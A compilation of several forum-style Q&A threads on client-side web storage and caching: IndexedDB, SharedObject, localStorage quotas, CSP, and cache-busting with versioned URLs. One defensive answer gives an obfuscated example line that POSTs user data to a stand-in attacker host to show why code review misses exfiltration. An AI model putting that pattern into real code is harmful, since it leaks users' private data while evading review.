We are in the process of building a conceptual model of a web-based audio editor, and the first problem we have run into is the client-side caching system. In my opinion as a server-side programmer, having a large cache on the client side is a great idea, because in many cases it takes load off the server by avoiding repeated downloads of the same data. Furthermore, such a cache could be a good candidate for a buffer for per-track operations, like filtering.
Our Flex programmer says that this is a big problem and that it is impossible in almost all cases. But I have serious doubts, because I know that the current version of Google Chrome can simply keep up to 2 GB in localStorage. Moreover, I've found an example of an online track editor, and its caching mechanism looks like it works pretty well.
Is it possible to cache some data (something like 100-200 MB) on the client side using Flash and JS?
You can use SharedObject to store the data.
I am pretty sure the default size limit is too low for your needs, so your app will need to ask the user to accept a higher limit:
http://www.macromedia.com/support/documentation/en/flashplayer/help/help06.html
SharedObject is more reliable than the browser cache, and you control it from your app.
If you are using HTML5, then you can store large amounts of data on the client side using HTML5's built-in database support.
This is what we did when writing a video editor. In Flash you can save files to the user's machine, with the restriction that the action must be explicit to the user (i.e. the user initiates it, goes through the OS dialog and saves the file as they would normally save anything they download). Similarly, you can load a file from the user's computer, with the restriction that the user must initiate the action (by clicking with a pointing device or pressing a key).
This has certain advantages over the various local storage strategies, which are mostly opaque to users (people don't usually know how to erase cookies, SharedObjects or the web storage that comes with more modern browsers, but they are perfectly capable of saving and deleting files on their system). Furthermore, all the opaque local storage options may have restrictions that less savvy users might not know how to overcome, or that may not be possible to overcome in general: size, location and ownership.
This will still be a bit of a hindrance for your audience, because every time they need to save a file, they have to go through the OS's dialog instead of doing Ctrl+S / Cmd+S / C-x C-s... But given all the other options, this, IMO, leaves the user with the most choices and delivers the best experience.
Another suggestion: you could, in principle, come up with an "enhanced" version of your application that users would install as a browser plugin (if it's an editor they use on a regular basis, why not?), in which case you wouldn't be limited to the clumsy options provided by web technologies. Chrome and Mozilla-based browsers encourage such development; however, it's not standardized. Still, since these two browsers run on virtually any OS, that doesn't sound like it particularly locks your users into a certain platform...
Suppose you have a website running on a server, and the website comes in three different versions: heavy, medium and lite. Now you have to load the lite version if the client's speed is below a certain limit (let's say 500 kbps), the medium version if it's in between (let's say >500 kbps and <25 Mbps), and the heavy version otherwise (more than 25 Mbps). Can you do it?
I was thinking of making a server-side script that first checks the connection speed with the client (I don't know how), then, based on the result, redirects them to the respective version.
If there is another way, please do tell...
There is no definitive, reliable way to do this and I recommend that you focus on building an optimized site for your intended target audience and their devices.
Internet connections are pretty good around the world. The effort and ongoing maintenance involved in updating and managing three frontends is not feasible. Instead, focus on serving optimized content and use modern techniques to serve media targeting screen size and device. Limit unnecessary media, compile and bundle scripts, ensure your servers serve gzipped content, and place your servers/CDNs near your audience.
If you did, however, want to pursue this exercise, you can play with the following idea: make an initial request to the server to get a timestamp (we want to work with the server's time, not the client's, which could be off). The client receives the timestamp and responds immediately, passing it back to the server. The server considers the difference between the two and redirects accordingly.
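Here is a minimal client-side sketch of that round trip; the /timestamp and /measure endpoints are made up for illustration, and the server is assumed to answer /measure with the path of the version it picked:

async function pickVersion() {
  // Get the server's clock, then echo it straight back; the server
  // compares the echoed value with its current time.
  const stamp = await fetch('/timestamp').then(r => r.text());
  const res = await fetch('/measure?stamp=' + encodeURIComponent(stamp));
  window.location = await res.text(); // e.g. "/lite", "/medium" or "/heavy"
}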
The problem is that connections are not consistent, and you cannot rely on that first connection to represent the client's connection quality. There may be a dip in connection quality as they are connecting etc.
Maintaining two or more server-side codebases is neither easy nor ideal. Focus on optimization, especially of website assets such as images; images account for about 75% of site load times.
Ideally, provide multiple image sources to start with, using img srcset.
What you are talking about is achievable for images and videos: you can offer more than three image candidates, and the browser will select the best one based on conditions such as the available connection speed.
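For example, here is a small sketch that sets srcset from script (the file names are made up; the same attributes can just as well be written directly in the HTML):

// Declare several candidates; the browser picks one based on viewport
// size, pixel density and, in some browsers, connection quality.
const img = document.createElement('img');
img.src = 'photo-small.jpg'; // fallback for browsers without srcset support
img.srcset = 'photo-small.jpg 480w, photo-medium.jpg 1024w, photo-large.jpg 1920w';
img.sizes = '100vw';
img.alt = 'Example photo';
document.body.appendChild(img);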
I created a small JavaScript application for which I reused some (quite large) JavaScript resources that I downloaded from the internet.
My application runs in the browser like other interactive web applications but works entirely offline.
However, I intend to enter some private information in the application which it shall visualize. Since I cannot ultimately trust the JavaScript pieces that I downloaded, I wonder if there is a JavaScript option to make sure that no data is downloaded and, in particular, uploaded to the web.
Note that I am aware that I could cut off the local internet connection, change browser settings or use an application firewall, but these would not be solutions that suit my needs. You may assume that the isolation of a browser instance is safe, that is, no other, possibly malicious, websites can access my offline JavaScript application or the user data I enter. If there is a secure way to (automatically) review the code of the downloaded resources (e.g. because communication is possible only via a few dedicated JavaScript commands that I could search for), that would be an acceptable solution too.
You should take a look at Content Security Policy (CSP) (see here and here). It basically blocks every connection from your browser to any other host unless it is explicitly allowed; a restrictive policy such as default-src 'self', for example, permits resources from your own origin only. Be aware that not all browsers support CSP, which leads to potential security problems.
Reviewing the library code might be difficult, because there are many ways to mask such code pieces.
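For instance, here is a tiny (hypothetical) illustration of why simply searching the source for network APIs is unreliable:

// The API name never appears literally in the source, so searching
// for "fetch" or "XMLHttpRequest" would not find this call.
var secret = 'private data entered by the user';
window['fe' + 'tch']('https://evil.example/exfil', { method: 'POST', body: secret });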
Find it yourself by watching your browser's network activity while your application is in action.
There are more than enough tools to do this. Also, if you know how to use the netstat command-line tool, it ships with Windows out of the box.
Here is one cool Chrome extension that watches the traffic of the current tab.
https://chrome.google.com/webstore/detail/http-trace/idladlllljmbcnfninpljlkaoklggknp
And here is another extension that can modify selected traffic.
https://chrome.google.com/webstore/detail/tamper-chrome-extension/hifhgpdkfodlpnlmlnmhchnkepplebkb?hl=en
You can set the filters and modify all requests/responses happening in your page.
If you want to write an extension to block requests yourself, check this answer out.
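For reference, a blocking listener in a (manifest v2) extension background script looks roughly like this; it assumes the webRequest and webRequestBlocking permissions are declared in manifest.json:

// Cancel every outgoing request; loosen the filter to allow what you trust.
chrome.webRequest.onBeforeRequest.addListener(
  function (details) {
    return { cancel: true };
  },
  { urls: ['<all_urls>'] },
  ['blocking']
);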
I have a program where the user does some actions (e.g. clicking on several buttons). I want to record their clicks and the buttons they click, and then let the user download a text file with a record of those clicks when they click a separate "download" button. I looked at the File System API for HTML5, but it seems to lack cross-browser support. I would ideally like the entire file generation and download scheme to be client-side, but I am open to server-side ideas as well.
TL;DR: Essentially I'm looking for an equivalent of Java's FileWriter, FileReader, ObjectOutputStream, and ObjectInputStream in vanilla JS or jQuery (I would like to stay away from PHP, but I'll use it as a last resort).
Also, why don't all browsers support the filesystem API? (I'm guessing it would make MS Word and Pages go out of business with all the open-source client-side text editors that could come out.)
Unfortunately the HTML5 File System API is no longer part of the spec. Long story short, Firefox refused to implement it because they claimed everything you could do in the File System API was doable in HTML5 IndexedDB (which was mostly true). Please see this blog post for more on why Firefox didn't implement it. I do not know IE's story. (I may have exaggerated why Firefox didn't implement it; I'm still bummed, because you cannot actually do everything in IndexedDB that you can do in the new "Chrome File System API".)
Typically, if two of the three major browsers implement a spec, it stays in the spec; otherwise the spec gets orphaned. However, I'm fairly certain a large reason the File System API didn't take off is that the IndexedDB API (see caniuse for IndexedDB) really took off when both specs were introduced. If you want cross-browser support, check this API out.
That all said, if you are still set on the File System API, some developers wrote a nice wrapper around IndexedDB that emulates it. The File System API wouldn't actually supply you with a stream anyway: you would have to keep appending events to a given file through a FileWriter object, then read the entire file, send it to the server via an AJAX request, and have it downloaded back from the server once it was successfully uploaded.
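For reference, that Chrome-only flow looks roughly like this (non-standard, prefixed API; the file name is made up):

// Ask for a sandboxed temporary filesystem, then append one event to a log file.
window.webkitRequestFileSystem(window.TEMPORARY, 5 * 1024 * 1024, function (fs) {
  fs.root.getFile('clicks.txt', { create: true }, function (entry) {
    entry.createWriter(function (writer) {
      writer.seek(writer.length); // move to the end so writes append
      writer.write(new Blob(['button clicked\n'], { type: 'text/plain' }));
    });
  });
});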
The better route would be to use the IndexedDB API which, as stated on developer.mozilla.org, follows this basic pattern:
1. Open a database.
2. Create an object store while upgrading the database.
3. Start a transaction and make a request to do some database operation, like adding or retrieving data.
4. Wait for the operation to complete by listening to the right kind of DOM event.
5. Do something with the results (which can be found on the request object).
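A minimal sketch of those steps applied to your click-recording case (the database and store names are made up):

// 1) Open the database; on first run this triggers an upgrade.
var request = indexedDB.open('clickLog', 1);

request.onupgradeneeded = function (event) {
  // 2) Create the object store while the database is being upgraded.
  event.target.result.createObjectStore('clicks', { autoIncrement: true });
};

request.onsuccess = function (event) {
  var db = event.target.result;
  document.addEventListener('click', function (e) {
    if (e.target.tagName !== 'BUTTON') return;
    // 3) Start a transaction and request a write.
    var tx = db.transaction('clicks', 'readwrite');
    tx.objectStore('clicks').add({ label: e.target.textContent, time: Date.now() });
    // 4) Wait for the right DOM event, then 5) act on the result.
    tx.oncomplete = function () { console.log('click recorded'); };
  });
};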
Here are a couple of tutorials on IndexedDB.
https://developer.mozilla.org/en-US/docs/Web/API/IndexedDB_API/Using_IndexedDB
http://www.html5rocks.com/en/tutorials/indexeddb/todo/
As for giving the user that file: as mentioned briefly before, you would have to upload the data to the server and serve it back when the user hits "download". Unfortunately, that means a round trip just to hand users data that is already on their machine. Anyway, hope this all helps.
I am using localStorage in this demo,
http://help.arcgis.com/en/webapi/javascript/arcgis/demos/exp/exp_webstorage.html
Basically it is a mapping application that caches map tiles in localStorage.
I quite quickly reach the 5 MB limit, and from then onwards I get QUOTA_EXCEEDED_ERR errors.
How can I extend localStorage? And what other options do I have for storing data on the client side in HTML5? Has anybody used IndexedDB, and does it work in Chrome?
http://www.w3.org/TR/IndexedDB/
And of course the Web SQL Database specification has been deprecated, so I would like to avoid that,
http://www.w3.org/TR/webdatabase/
My understanding is that the user can extend localStorage but the website can't (by design). You simply need to catch the error in JavaScript and show the user a dialog requesting that they increase their storage limit, preferably providing instructions for the major browsers.
EDIT: Perhaps not so simple. It seems some browsers don't allow the user to increase the storage size. Google seems convinced the localStorage API doesn't scale well to large files and developers should consider IndexedDB instead.
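Catching the quota error looks something like this (a sketch; the exact exception name varies a bit across browsers):

function cacheTile(key, dataUrl) {
  try {
    localStorage.setItem(key, dataUrl);
    return true;
  } catch (e) {
    // Thrown as QUOTA_EXCEEDED_ERR / QuotaExceededError once the
    // (typically ~5 MB) limit is hit; prompt the user or fall back here.
    console.warn('localStorage quota exceeded', e);
    return false;
  }
}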
Currently browsers have an incomplete caching implementation: you can only set a future expiration date or keep immediate expiration. An important third option, expiring the cache programmatically, is missing. Without it, developers cannot deploy new versions of code efficiently and reliably.
If they use the second option, it is inefficient when they have a framework of many small files. Combining the small files into one does not help either, because any small change causes the whole framework to be re-downloaded instead of one single file.
If they use the first option, updates will not reach users until the cache expires, which creates compatibility problems between server-side and client-side code, and potentially between different parts of the client-side code. Setting an expiration date requires predicting future deployments, which is inconvenient and rules out quick bug fixes.
When people ask about this problem, some suggest using version numbers or other temporary IDs to trick the browser cache into loading unique URLs. The problem is that this puts unnecessary overhead on the network and the local file system, which must load and store obsolete old versions under tons of unique URLs. It almost defeats the purpose of caching by URL.
The right solution would be to allow the programmer of a website to clear the cache of files that came from that website only. That way, a list of updated files could be requested, and the cached copies of those files would be evicted so the browser loads fresh versions.
A proper caching mechanism is a simple and powerful pattern that could boost all client-side web development to a new level; I only wonder why browser vendors haven't implemented it yet.
Hehe, well, as far as we developers are concerned, of course!
On the other hand, the cache is there to improve the user's experience in terms of responsiveness. It is our responsibility to work around all these nuisances and protect the user in a shell of ignorance and all-is-wellness.
I do not think it is that easy. One problem I can see is that it is not just the browser cache: your files can be cached in many places along the way from your server to the browsers (clients). Some of the browsers could still use the old version, and the answer to which cache gets cleared and what version is supposed to go to a particular client becomes really uncertain really fast.
It's an interesting idea, but how would the browser know when to ask your website if it should clear the cache? Every time the page is loaded? Wouldn't that partially defeat the purpose of caching? Set reasonable cache expiration intervals, and schedule your updates to match those, and it should be ok as it is.
I don't think what you suggest is necessary or desirable.
The client-side cache should be controlled by the user, not by you (the data/code provider). If the user wants a better way to manage his "Temporary Internet Files", then that's up to the browser developers, but I think you should not have a say in how it is managed.
For all intents and purposes, you only need to say, "this data/code is usable until X date", "this data/code is usable until Y version", or "it's never usable again".
Excellent cache control strategies can already be set up using the existing HTTP headers (Cache-Control, ETag, etc.). If you want something to be "forced" to refresh, you can always add a querystring with the date on it. This is not really a hack, as you suggest, because you are saying "get me the version of the file as of this date"... and your server has all the freedom in the world to refresh the caching policy: return a 302 redirect to the non-querystring version, send down new headers, etc.
Edit:
I can refine my idea from above:
You can use a path or querystring to identify the "current" version:
http://somedomain.com/somepath/current/yourfile.js
The "current" URL can be set up to give a 302 redirect to a particular version of yourfile.js, while also telling the browser never to cache the current version:
302 Moved Temporarily
Location: /somepath/v3.2.3/yourfile.js
Cache-Control: no-cache
This allows your "loader" HTML to include JavaScript that decides to use a certain version:
<script type="text/javascript">
<?php
if ($action == "clearCache") {
    print "var version = 'current';";
} else {
    print "var version = '" . $version . "';";
}
?>
</script>
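The version variable could then be used to build the actual script URL, along the lines of this sketch (reusing the example path from above):

// Load yourfile.js through the versioned path; requesting "current"
// goes through the 302 redirect, anything else stays cached normally.
document.write('<script src="/somepath/' + version + '/yourfile.js"><\/script>');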
They theoretically do, with cache parameters in the HTTP headers and meta tags (google "meta no-cache" or "PHP/ASP no-cache"), like cache expiry dates and so on.
I agree that this is flaky in most, if not all, browsers: sometimes it works, sometimes it doesn't, or it takes more time to clear the cache for some reason.
But it would be nice to have that option in the markup itself, like JavaScript or something directly on the tags, e.g. img src="blah.jpg" expires="my_blah_last_edited" (a hypothetical attribute).
It could be better, true.
I imagine there are great security concerns. You have anonymous, remote web pages telling a local client to delete files on the client machine - this has all sorts of potential for disaster. Would you trust IE to do this? It just sounds too risky. There's a big difference between a directive not to cache something in the first place and a directive to delete something already in existence from the cache.
Why not embed some kind of unique tag or timestamp in the image (etc.) URI for each deployment, thereby causing the browser to reload?
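For instance, a small sketch of that approach; the build id and the logo element are made up, and the id would be injected at deploy time:

// Append a per-deployment id so each release gets fresh URLs, while
// within one release the browser keeps hitting its cache.
var BUILD_ID = '20240601-1';
function asset(url) {
  return url + (url.indexOf('?') >= 0 ? '&' : '?') + 'v=' + BUILD_ID;
}
document.getElementById('logo').src = asset('blah.jpg');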
There should be a JavaScript or jQuery mechanism that tells the browser the content has changed and makes it download the content again even though its URL is the same.